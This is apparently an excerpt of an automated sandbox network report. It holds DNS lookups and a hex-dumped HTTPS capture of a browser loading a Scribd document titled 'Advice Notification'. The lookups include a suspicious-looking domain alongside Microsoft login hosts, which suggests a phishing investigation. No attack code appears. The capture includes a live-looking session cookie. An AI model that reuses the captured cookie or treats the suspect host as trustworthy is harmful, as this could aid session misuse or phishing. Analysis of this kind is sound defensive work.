                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:03.489042997 CET1.1.1.1192.168.2.160x4f28No error (0)cos.na-siliconvalley.myqcloud.com170.106.97.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:03.489042997 CET1.1.1.1192.168.2.160x4f28No error (0)cos.na-siliconvalley.myqcloud.com170.106.97.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:03.489042997 CET1.1.1.1192.168.2.160x4f28No error (0)cos.na-siliconvalley.myqcloud.com170.106.97.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:03.493313074 CET1.1.1.1192.168.2.160xbc50No error (0)drizzysamson.constructappsolution.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:03.493465900 CET1.1.1.1192.168.2.160xdc0aNo error (0)drizzysamson.constructappsolution.com104.21.89.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:03.493465900 CET1.1.1.1192.168.2.160xdc0aNo error (0)drizzysamson.constructappsolution.com172.67.157.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:04.984884024 CET1.1.1.1192.168.2.160x6ddeNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:04.984884024 CET1.1.1.1192.168.2.160x6ddeNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:05.234968901 CET1.1.1.1192.168.2.160xa836No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:05.234968901 CET1.1.1.1192.168.2.160xa836No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:07.252254009 CET1.1.1.1192.168.2.160xe637No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:07.342622995 CET1.1.1.1192.168.2.160x4e22No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:09.025686979 CET1.1.1.1192.168.2.160x3a2cNo error (0)drizzysamson.constructappsolution.com104.21.89.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:09.025686979 CET1.1.1.1192.168.2.160x3a2cNo error (0)drizzysamson.constructappsolution.com172.67.157.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:09.026917934 CET1.1.1.1192.168.2.160x2b6cNo error (0)drizzysamson.constructappsolution.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:12.103794098 CET1.1.1.1192.168.2.160x432fNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:12.103794098 CET1.1.1.1192.168.2.160x432fNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:12.103794098 CET1.1.1.1192.168.2.160x432fNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:12.132328987 CET1.1.1.1192.168.2.160x3b2fNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:12.132328987 CET1.1.1.1192.168.2.160x3b2fNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:12.344836950 CET1.1.1.1192.168.2.160x115eNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:12.344836950 CET1.1.1.1192.168.2.160x115eNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:14.549076080 CET1.1.1.1192.168.2.160x6695No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:14.549076080 CET1.1.1.1192.168.2.160x6695No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:14.549076080 CET1.1.1.1192.168.2.160x6695No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:14.550211906 CET1.1.1.1192.168.2.160xdd5eNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:14.550211906 CET1.1.1.1192.168.2.160xdd5eNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:14.578922033 CET1.1.1.1192.168.2.160x4de6No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:14.578922033 CET1.1.1.1192.168.2.160x4de6No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:26.284627914 CET1.1.1.1192.168.2.160xfb7eNo error (0)wa.scribd.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:26.284627914 CET1.1.1.1192.168.2.160xfb7eNo error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:26.284627914 CET1.1.1.1192.168.2.160xfb7eNo error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:26.284627914 CET1.1.1.1192.168.2.160xfb7eNo error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:26.284627914 CET1.1.1.1192.168.2.160xfb7eNo error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:26.286636114 CET1.1.1.1192.168.2.160x1742No error (0)wa.scribd.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:29.851188898 CET1.1.1.1192.168.2.160x3ddbNo error (0)wa.scribd.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:29.852587938 CET1.1.1.1192.168.2.160x6220No error (0)wa.scribd.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:29.852587938 CET1.1.1.1192.168.2.160x6220No error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:29.852587938 CET1.1.1.1192.168.2.160x6220No error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:29.852587938 CET1.1.1.1192.168.2.160x6220No error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:29.852587938 CET1.1.1.1192.168.2.160x6220No error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:39.423059940 CET1.1.1.1192.168.2.160x2b25No error (0)w3-reporting-nel.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:39.423059940 CET1.1.1.1192.168.2.160x2b25No error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:39.423059940 CET1.1.1.1192.168.2.160x2b25No error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:39.423059940 CET1.1.1.1192.168.2.160x2b25No error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:39.423059940 CET1.1.1.1192.168.2.160x2b25No error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:39.423111916 CET1.1.1.1192.168.2.160x5838No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:39.506652117 CET1.1.1.1192.168.2.160x17ecNo error (0)w3-reporting-nel.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        0192.168.2.1649710151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:13 UTC695OUTGET /document/801519291/Advice-Notification HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:14 UTC1186INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1778653
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                                        Etag: W/"52b29c8b399807d27da73010872b1650"
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 14:58:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Link: <https://cmp.osano.com/AzZdHGSGtpxCq1Cpt/4e10b135-d113-4574-a477-270ace40bba7/osano.js?language=en>; rel=preload; as=script; critical, </options/exposed_to_client.js>; rel=preload; as=script; critical
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Status: 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 259
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                                        X-Request-Id: db219cc9060b17c20d2ba1ee52580c08676d55adbd381590105cf12cf2c9e88e
                                                                                                                                                                                                                                                                                                                                                                                        X-Runtime: 0.252145
                                                                                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740021-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522354.137972,VS0,VE402
                                                                                                                                                                                                                                                                                                                                                                                        Vary: X-Language-Locale,X-Bot,X-Fastly-Mobile,Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:14 UTC290INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 73 63 72 69 62 64 5f 75 62 74 63 3d 75 25 33 44 37 37 65 61 62 62 61 37 2d 35 36 64 62 2d 34 32 36 33 2d 61 39 39 35 2d 31 34 65 30 38 33 63 39 38 36 36 62 25 32 36 68 25 33 44 69 65 6a 6b 25 32 42 4a 6f 36 58 7a 49 39 52 72 46 4e 71 45 46 42 25 32 42 62 72 33 5a 5a 68 79 55 46 74 65 33 66 57 6c 4f 47 6d 67 25 32 42 37 73 25 33 44 3b 20 44 6f 6d 61 69 6e 3d 2e 73 63 72 69 62 64 2e 63 6f 6d 3b 20 50 61 74 68 3d 2f 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 31 32 20 4e 6f 76 20 32 31 32 34 20 32 31 3a 35 39 3a 31 34 20 47 4d 54 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 3b 20 53 65 63 75 72 65 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Set-Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; Domain=.scribd.com; Path=/; Expires=Sun, 12 Nov 2124 21:59:14 GMT; SameSite=None; Securealt-svc: h3=":443";ma=86400,h3-29=":443"
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:14 UTC1378INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 3e 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 73 63 72 69 62 64 2d 63 6f 6d 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 61 70 70 73 2f 73 63 72 69 62 64 2d 63 6f 6d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><head prefix="og: http://ogp.me/ns# scribd-com: http://ogp.me/ns/apps/scribd-com
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:14 UTC1378INData Raw: 69 62 64 61 73 73 65 74 73 2e 63 6f 6d 2f 22 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 2e 6f 75 74 65 72 5f 70 61 67 65 2c 2e 6f 75 74 65 72 5f 70 61 67 65 5f 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6f 75 74 65 72 5f 70 61 67 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 61 75 74 6f 20 32 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 63 6f 6e 74 61 69 6e 3a 73 74 72 69 63 74 7d 2e 6f 75 74 65 72 5f 70 61 67 65 2e 62 6f 6f 6b 5f 76 69 65 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 6f 75 74 65 72 5f 70 61 67 65 2e 62 6c 75 72 72 65 64 5f 70 61 67 65 7b 2d 77 65 62 6b 69 74 2d 75
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ibdassets.com/";</script><style>.outer_page,.outer_page_container{position:relative}.outer_page{display:block;font-size:16px;margin:10px auto 20px;overflow:hidden;contain:strict}.outer_page.book_view{display:inline-block}.outer_page.blurred_page{-webkit-u
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:14 UTC1378INData Raw: 2e 6c 32 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 32 70 78 7d 2e 74 65 78 74 5f 6c 61 79 65 72 20 73 70 61 6e 2e 6c 32 2c 2e 74 65 78 74 5f 6c 61 79 65 72 20 73 70 61 6e 2e 6c 33 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 31 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 74 65 78 74 5f 6c 61 79 65 72 20 73 70 61 6e 2e 6c 33 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 33 70 78 7d 2e 74 65 78 74 5f 6c 61 79 65 72 20 73 70 61 6e 2e 6c 34 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 34 70 78 7d 2e 74 65 78 74 5f 6c 61 79 65 72 20 73 70 61 6e 2e 6c 34 2c 2e 74 65 78 74 5f 6c 61 79 65 72 20 73 70 61 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .l2{margin:0 0 0 -2px}.text_layer span.l2,.text_layer span.l3{white-space:nowrap;padding:0;border:none;height:1px;line-height:1;display:inline}.text_layer span.l3{margin:0 0 0 -3px}.text_layer span.l4{margin:0 0 0 -4px}.text_layer span.l4,.text_layer span
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:14 UTC1378INData Raw: 61 70 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 31 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 74 65 78 74 5f 6c 61 79 65 72 20 73 70 61 6e 2e 77 34 7b 77 69 64 74 68 3a 34 70 78 7d 2e 74 65 78 74 5f 6c 61 79 65 72 20 73 70 61 6e 2e 77 35 7b 77 69 64 74 68 3a 35 70 78 7d 2e 74 65 78 74 5f 6c 61 79 65 72 20 73 70 61 6e 2e 77 35 2c 2e 74 65 78 74 5f 6c 61 79 65 72 20 73 70 61 6e 2e 77 36 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 31 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ap;padding:0;margin:0;border:none;height:1px;line-height:1;display:inline-block}.text_layer span.w4{width:4px}.text_layer span.w5{width:5px}.text_layer span.w5,.text_layer span.w6{white-space:nowrap;padding:0;margin:0;border:none;height:1px;line-height:1;
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:14 UTC1378INData Raw: 27 64 61 74 61 4c 61 79 65 72 27 2c 27 47 54 4d 2d 4b 58 51 51 57 44 47 27 29 3b 0a 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 73 74 72 69 70 65 2e 63 6f 6d 2f 76 33 2f 22 20 61 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 74 69 74 6c 65 3e 41 64 76 69 63 65 20 4e 6f 74 69 66 69 63 61 74 69 6f 6e 20 7c 20 50 44 46 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 'dataLayer','GTM-KXQQWDG'); </script><script src="https://js.stripe.com/v3/" async></script><title>Advice Notification | PDF</title><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:14 UTC1378INData Raw: 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 64 76 69 63 65 20 4e 6f 74 69 66 69 63 61 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 76 32 2d 31 2d 66 2e 73 63 72 69 62 64 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 67 2f 64 6f 63 75 6d 65 6e 74 2f 38 30 31 35 31 39 32 39 31 2f 6f 72 69 67 69 6e 61 6c 2f 66 30 64 35 38 34 35 30 35 37 2f 31 3f 76 3d 31 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 61 6c 74 22 20 63 6f 6e 74 65 6e 74 3d 22 41 64 76 69 63 65 20 4e 6f 74 69 66 69 63 61 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: property="og:description" content="Advice Notification"><meta property="og:image" content="https://imgv2-1-f.scribdassets.com/img/document/801519291/original/f0d5845057/1?v=1"><meta property="og:image:alt" content="Advice Notification"><meta property="og
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:14 UTC1378INData Raw: 22 4d 65 64 69 61 4f 62 6a 65 63 74 22 2c 22 61 64 64 69 74 69 6f 6e 61 6c 54 79 70 65 22 3a 22 50 72 6f 64 75 63 74 22 2c 22 6e 61 6d 65 22 3a 22 41 64 76 69 63 65 20 4e 6f 74 69 66 69 63 61 74 69 6f 6e 22 2c 22 69 6d 61 67 65 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 69 6d 67 76 32 2d 32 2d 66 2e 73 63 72 69 62 64 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 67 2f 64 6f 63 75 6d 65 6e 74 2f 38 30 31 35 31 39 32 39 31 2f 31 34 39 78 31 39 38 2f 32 63 30 62 33 30 36 35 38 30 2f 31 37 33 33 34 39 37 31 31 39 3f 76 3d 31 22 2c 22 68 74 74 70 73 3a 2f 2f 69 6d 67 76 32 2d 31 2d 66 2e 73 63 72 69 62 64 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 67 2f 64 6f 63 75 6d 65 6e 74 2f 38 30 31 35 31 39 32 39 31 2f 32 39 38 78 33 39 36 2f 37 34 61 39 64 32 34 61 30 62 2f 31 37 33 33
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "MediaObject","additionalType":"Product","name":"Advice Notification","image":["https://imgv2-2-f.scribdassets.com/img/document/801519291/149x198/2c0b306580/1733497119?v=1","https://imgv2-1-f.scribdassets.com/img/document/801519291/298x396/74a9d24a0b/1733
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:14 UTC1378INData Raw: 70 61 63 6b 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 69 63 6f 6e 73 2f 69 63 6f 6e 73 2e 66 33 31 62 34 64 34 36 2e 73 76 67 23 69 63 6f 6d 6f 6f 6e 29 20 66 6f 72 6d 61 74 28 22 73 76 67 22 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 5b 63 6c 61 73 73 2a 3d 22 20 69 63 6f 6e 2d 22 5d 2c 5b 63 6c 61 73 73 5e 3d 69 63 6f 6e 2d 5d 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 63 72 69 62 64 21 69 6d 70 6f 72 74 61 6e 74 3b 73 70 65 61 6b 3a 6e 65 76 65 72 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: pack/assets/fonts/icons/icons.f31b4d46.svg#icomoon) format("svg");font-weight:400;font-style:normal;font-display:block}[class*=" icon-"],[class^=icon-]{font-family:scribd!important;speak:never;font-style:normal;font-weight:400;font-variant:normal;text-tra
